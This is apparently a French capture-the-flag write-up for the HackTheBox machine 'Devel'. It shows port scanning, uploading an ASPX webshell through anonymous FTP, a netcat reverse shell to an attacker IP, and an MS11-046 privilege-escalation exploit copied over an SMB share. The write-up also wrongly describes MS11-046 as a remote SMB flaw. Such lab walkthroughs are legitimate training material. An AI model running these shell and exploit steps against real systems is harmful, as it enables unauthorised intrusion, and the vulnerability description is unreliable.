Devel HackTheBox (Writeup)

Reconnaissance

Création de l'espace de travail :

Nous établirons notre espace de travail en créant trois dossiers pour stocker les contenus importants, les exploits et les résultats de la reconnaissance à l'aide de Nmap.

Vérification de la Connectivité VPN

Vérification de la connexion VPN pour assurer une communication stable avec la machine cible.

Recherche des ports ouverts avec Nmap :

Exploration des ports ouverts et exportation dans le fichier "allPorts" dans le répertoire Nmap:

nmap -p- --open -sS -n -Pn --min-rate 5000 10.10.10.5 -oG allPorts

Analyse des ports ouverts avec extractPorts:

Utilisation de la fonction extractPorts pour afficher de manière synthétique les ports ouverts et les copier dans le presse-papiers.

Scan de la version des ports avec Nmap:

Utilisation de Nmap pour scanner la version des ports et extraction des informations dans le fichier "targeted" :

nmap -sCV -p21,80 10.10.10.5 -oN targeted

Analyse des services

Port 21 - FTP

Le serveur FTP est accessible avec des identifiants anonymes. En explorant le répertoire FTP, nous découvrons trois fichiers :

aspnet_client
iisstart.htm
welcome.png

L’image welcome.png semble être une bannière standard.

Port 80 - HTTP:

Le serveur HTTP affiche une page contenant la même bannière que celle découverte sur le FTP. Cela suggère que le site web récupère ses fichiers directement depuis le serveur FTP.

Tests d’écriture sur le FTP

En testant les permissions d’écriture sur le serveur FTP, nous confirmons qu’il est possible d’ajouter des fichiers avec la commande

put test.txt

Exploitation - Reverse Shell via FTP

Upload d’une Webshell ASPX

Nous utilisons une webshell préexistante, cmd.aspx, provenant de SecLists :

locate cmd.aspx
cp /usr/share/davtest/backdoors/aspx_cmd.aspx .

Ensuite, nous l’importons sur le serveur FTP :

ftp 10.10.10.5
anonymous
put aspx_cmd.aspx

Nous accédons à la webshell via le serveur HTTP et exécutons des commandes, par exemple :

ipconfig

Upload du binaire `nc.exe` pour un reverse shell

Nous téléchargeons nc.exe depuis SecLists :

locate nc.exe 
cp /usr/share/SecLists/Web-Shells/FuzzDB/nc.exe .

Puis, nous l’ajoutons sur le serveur FTP :

ftp 10.10.10.5
anonymous
put nc.exe

À partir de la webshell, nous localisons le fichier nc.exe sur le serveur cible:

dir /s C:\nc.exe

Mise en place du reverse shell

Écoute sur le port 443 :

Nous avons mis en place un listener avec nc pour écouter sur le port 443 :

rlwrap nc -nvlp 443

Depuis la machine cible, nous exécutons la commande suivante via la webshell :

C:\inetpub\wwwroot\nc.exe -e cmd 10.10.14.26 443

Élévation de privilèges

Kernel Explotation:

Vérification des informations système

Avec la commande systeminfo, nous identifions que la machine utilise Windows 7 Enterprise, ce qui ouvre la possibilité d'exploiter des vulnérabilités connues pour cette version.

systeminfo

Le résultat nous indique que la machine utilise Windows 7 Enterprise, avec la version suivante :

OS VERSION: 6.1.7600 N/A Build 7600

Exploitation Vulnérabilité MS11-046

Cela nous permet de savoir que la machine pourrait être vulnérable à certaines failles connues, telles que MS11-046, une vulnérabilité dans le service Windows SMB.

windows-kernel-exploits/MS11-046 at master · SecWiki/windows-kernel-exploitsGitHub

La vulnérabilité MS11-046 permet à un attaquant de s'exécuter à distance avec les privilèges NT AUTHORITY\SYSTEM via le service SMB. Pour exploiter cette vulnérabilité, nous allons transférer et exécuter un fichier malveillant sur la machine cible.

File Transfer Windows (smb)

Nous utilisons smbserver.py pour partager un répertoire contenant le fichier exploit ms11-046.exe. Ce fichier est ensuite copié sur la machine cible.

smbserver.py share $(pwd) -smb2support

Depuis la machine cible, nous copions le fichier malveillant à l'aide de la commande SMB :

copy \\10.10.14.26\share\ms11-046.exe ms11.exe

Exécution de l'exploit

Une fois le fichier transféré, nous exécutons ms11-046.exe sur la machine cible pour exploiter la vulnérabilité et obtenir un shell avec les privilèges SYSTEM. Pour cela, nous utilisons la commande suivante :

.\ms11.exe

Flag user.txt :)

Flag root.txt :)

Mis à jour il y a 1 an

hashtagReconnaissance

hashtagAnalyse des services

hashtagPort 21 - FTP

hashtagPort 80 - HTTP:

hashtagTests d’écriture sur le FTP

hashtagExploitation - Reverse Shell via FTP

hashtagUpload d’une Webshell ASPX

hashtagUpload du binaire nc.exe pour un reverse shell

hashtagMise en place du reverse shell

hashtagÉlévation de privilèges

hashtagKernel Explotation:

hashtagVérification des informations système

hashtagExploitation Vulnérabilité MS11-046

hashtagFile Transfer Windows (smb)

hashtagFlag user.txt :)

hashtagFlag root.txt :)